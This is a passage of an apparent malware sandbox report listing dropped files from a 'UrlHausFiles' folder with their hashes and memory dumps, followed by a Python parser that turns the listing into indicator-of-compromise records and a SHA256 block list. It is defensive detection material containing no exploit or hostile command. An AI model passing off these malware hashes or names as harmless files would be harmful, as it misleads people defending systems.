memory/1992-987-0x0000000025F90000-0x0000000025FD2000-memory.dmp

memory/2392-988-0x0000000000400000-0x000000000064F000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

MD5 d76e1525c8998795867a17ed33573552
SHA1 daf5b2ffebc86b85e54201100be10fa19f19bf04
SHA256 f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
SHA512 c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

MD5 ca480193e4b8159dd1283118ebde8896
SHA1 857fb4852f31428ead5e2d9fbd5bfb16d9714d1a
SHA256 377717dd342a9169589d1e2c8509d12ceafe9c43b3407ab16771ec611a367a2a
SHA512 a49927f1dffe8d14f592e767415c490f4bdc9fb5d7ce45f10f5e6c7aa5c20b79412abc8d4f799cfd88aeeac3ef73f55a9710503a9a612efb5d414ec95a3e7ed9

memory/4296-1015-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\update.exe

MD5 ffc2637acde7b6db1823a2b3304a6c6c
SHA1 8eac6fb5415f9338b1b131c42ed15ea70da22096
SHA256 35efc0520b78a1b413afee5dbe5d8b0674eea2acfc7d943de70a99b5b2fd92ef
SHA512 3f9f0182d69b66ea6168717f8e7239a0726066e011be1983da874f76ee308e67ef55cd08a2d8990cd9e4a663bbbbf56c3445275d72e8330255b3d0dd3b98859a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\06D4148FB55A65DDC0B3617260FF0892

MD5 11787b39f38dcae84937905dd1c389a5
SHA1 695631fe1fd02c7de5db29e8ac4e7267e34ebfb0
SHA256 e01c8cc012ad92455b81e79785c7114bb7c8a80ff6e1feeb74f0ba796752da8a
SHA512 171e702d4a88f2c5bc1079fee78f60085708d17ae257d02807fdd33f9e559ea6340ffd9f33953fc0262554428c05ccc87b4413fa633fa784ea1a77e80a34693b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\06D4148FB55A65DDC0B3617260FF0892

MD5 5bfa51f3a417b98e7443eca90fc94703
SHA1 8c015d80b8a23f780bdd215dc842b0f5551f63bd
SHA256 bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128
SHA512 4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

MD5 708adef6da5ac2ffee5f01f277560749
SHA1 3dedb41674634e6b53dfaea704754cee7bddfbe3
SHA256 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a
SHA512 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28

memory/2984-1053-0x0000000010000000-0x0000000010026000-memory.dmp

memory/5948-1061-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2696-1059-0x00007FF7BCE50000-0x00007FF7BDAA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 680ac3eb351fa5695226c02d374440f4
SHA1 199b9e1c310270c9b376dbb95a4c4165ce0ecd88
SHA256 4c12ce3f75bb90fba67dd1d3de6c2f6667252810aff265acca97b2ea3c9ef22d
SHA512 9776ad3884abe406c85a6e5bb80e39bf5200ab483af72c2b7b586ed80eb441a73edc3bda8f071c795a3e8526a2c9f8166e509cb0d7b0caf12f48d14f8ec78bf8

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

MD5 1fef0891d1e71750effaca0d02f218ee
SHA1 cbf1fdde74cda519c34c63eeabaff64bd9e0ecc9
SHA256 8dce0aecb8fe99a179e928fcc5e79d1c7e88b35cf9cdc911c3e75ba3d7e4f90b
SHA512 a864003b524e3467e839dc60f7191b36bebc4ba400c53834efa93a982064478cf5d1c079154c65aa3927ec3869bd4f38acd41eb79302e5616f4f7e40e85a5bf3

memory/1992-1140-0x00000000022B0000-0x000000000234E000-memory.dmp

memory/1992-1139-0x0000000001E00000-0x0000000001EA3000-memory.dmp

memory/1992-1141-0x0000000002350000-0x0000000002470000-memory.dmp

memory/1992-1138-0x0000000001800000-0x00000000018AE000-memory.dmp

memory/1992-1136-0x0000000001A80000-0x0000000001DF4000-memory.dmp

memory/1992-1135-0x0000000000DD0000-0x0000000000E8D000-memory.dmp

memory/1992-1134-0x0000000000D60000-0x0000000000DC7000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 c02ba0783524ac6a002584df32d7e17c
SHA1 255cee28715d8b61153c675597d47b129f392f13
SHA256 bd7691f88d4f137f854b08bbb49450e57524b794a41a4101b4d787d1b0f0005d
SHA512 7ed3471daac7069634a2e67b140b05a1a335b02c792533b80e9baf7ec948dd5f943b337ca7a93c36c8ad09038a5e11cffabea64f41c54a00dd47d90da6b3b5a9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\66ac0ad8-1b06-486e-b437-3e5497b88f58.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 16b50170fda201194a611ca41219be7d
SHA1 2ddda36084918cf436271451b49519a2843f403f
SHA256 a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a
SHA512 f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 77dd45c22541443ae7d4a340ae40ad05
SHA1 6df1c240270c2efad5cecf15a19224527307464d
SHA256 e9c96504f928293c9ce6b99de2f9eb53d431d1bbd366adb7871cb8a6025de213
SHA512 3b2d0e65ea5ab2bde7ef5b9a74bcad6f7de5493a807f85c4a321ee3f00c89b626b3d5312cf957942e494cfa4d53d34b8a4cc31350410e4c7019172ade104424f

memory/2480-1235-0x00000000002F0000-0x0000000000302000-memory.dmp

memory/2480-1237-0x00000000022D0000-0x00000000022D6000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\a.exe

MD5 ff370f449a6e83018df4b4163380fc57
SHA1 012c030503055803fd192c60dcc9e4733f917025
SHA256 1aa867bb4fb60de654e5e166c0a0e45c3b131a0131484c6b8888fea501c37b3a
SHA512 b0b41d5b391f6cfd582830abe132b87dc9434768c78dca90b3b8aaffe40880f6bb07a120b60cd4832e72202ea7c8257f4ec20d0b152136f6fc1ceb0a2b23ad7e

C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe

MD5 59a9510540fec35043b990deb270b139
SHA1 54d66862a4c08ebcba8029ec99d558725603f486
SHA256 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
SHA512 011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06
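The listing above is raw sandbox output: a dropped-file path, a blank line, four digests, and memory-dump entries (`memory/<pid>-<seq>-<start>-<end>-memory.dmp`) interleaved where the sandbox captured a region. Note that the same path recurs with different hashes (three distinct files were written as `svchost.exe`, two as `random.exe` and two as `file.exe`), and that browser-profile churn (Edge `Preferences`, `Crashpad\settings.dat`, `CryptnetUrlCache`) is listed alongside the actual payload drops in `UrlHausFiles`, so hunting on every hash here would generate noise. The parser below is an added example, not part of the report or of the sandbox's own tooling: it turns this listing into records, groups hashes by basename, builds a SHA256 lookup set and excludes profile-directory paths with a heuristic that is my own assumption. The sample input is an excerpt copied from the listing above.

```python
"""Parse a sandbox 'Files' listing into IOC records and a hunt-ready hash set."""
import hashlib
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Excerpt copied from the dropped-file listing above: two distinct files both
# written as svchost.exe, one memory dump, and one browser-profile artifact.
SAMPLE_LISTING = r"""
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 8911e8d889f59b52df80729faac2c99c
SHA1 31b87d601a3c5c518d82abb8324a53fe8fe89ea1
SHA256 8d0c2f35092d606d015bd250b534b670857b0dba8004a4e7588482dd257c9342
SHA512 029fd7b8b8b03a174cdc1c52d12e4cf925161d6201bbe14888147a396cd0ba463fd586d49daf90ec00e88d75d290abfeb0bb7482816b8a746e9c5ce58e464bcf

memory/752-814-0x00007FF758F00000-0x00007FF758F7D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 5e29a1fb83113320f38278bc60fab3d0
SHA1 d0d1317751bac9e8ad70fcd2d637a7debba204db
SHA256 f9e3a8f71f48f995134f7f26ffd3fd6c84d70b719c1373b07faf70c9c160a5f4
SHA512 327dd8a82bf9f42e0363918915b01ed2d81b8ba795dc27e41963312551b4bf581980ca6a55f6d7676473ef4714c053eee28614dd79f105d53e762f4797d09b73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c03d23a8155753f5a936bd7195e475bc
SHA1 cdf47f410a3ec000e84be83a3216b54331679d63
SHA256 6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA512 6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Heuristic (my assumption, not from the report): paths under a browser profile
# or the CryptoAPI URL cache are side effects of the detonation, not payloads.
PROFILE_MARKERS = ("\\User Data\\", "\\CryptnetUrlCache\\")


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)

    @property
    def basename(self):
        return self.path.rsplit("\\", 1)[-1]


@dataclass
class MemoryDump:
    pid: int
    start: int
    end: int

    @property
    def size(self):
        return self.end - self.start


def parse_listing(text):
    """Walk the listing line by line; a non-hash, non-dump line opens a record."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                raise ValueError(f"hash line without a preceding path: {line}")
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length for {current.path}")
            current.hashes[algo] = digest
            continue
        m = MEM_RE.match(line)
        if m:
            dumps.append(MemoryDump(int(m.group(1)), int(m.group(2), 16), int(m.group(3), 16)))
            current = None  # a dump line closes the open file record
            continue
        current = DroppedFile(line)
        files.append(current)
    return files, dumps


def by_basename(files):
    """Map basename -> set of SHA256s, exposing reused names like svchost.exe."""
    groups = defaultdict(set)
    for f in files:
        if "SHA256" in f.hashes:
            groups[f.basename].add(f.hashes["SHA256"])
    return groups


def payload_candidates(files):
    """Drop browser-profile and CryptoAPI cache churn before building hunt lists."""
    return [f for f in files if not any(mk in f.path for mk in PROFILE_MARKERS)]


def build_hashset(files, algo="SHA256"):
    return {f.hashes[algo] for f in files if algo in f.hashes}


def matches_known_drop(data, hashset):
    """Check a file's bytes against the SHA256 set (sweep with a directory walk)."""
    return hashlib.sha256(data).hexdigest() in hashset


if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE_LISTING)
    for name, shas in by_basename(files).items():
        print(f"{name}: {len(shas)} distinct SHA256")
    for d in dumps:
        print(f"pid {d.pid}: dump of 0x{d.size:X} bytes at 0x{d.start:X}")
    print(f"{len(payload_candidates(files))} payload candidates of {len(files)} files")
```

Run against the full Files section rather than the excerpt to get the complete hash set; `payload_candidates` is the list worth pushing to an EDR blocklist, while `by_basename` is the list of filenames worth a name-based hunt regardless of hash.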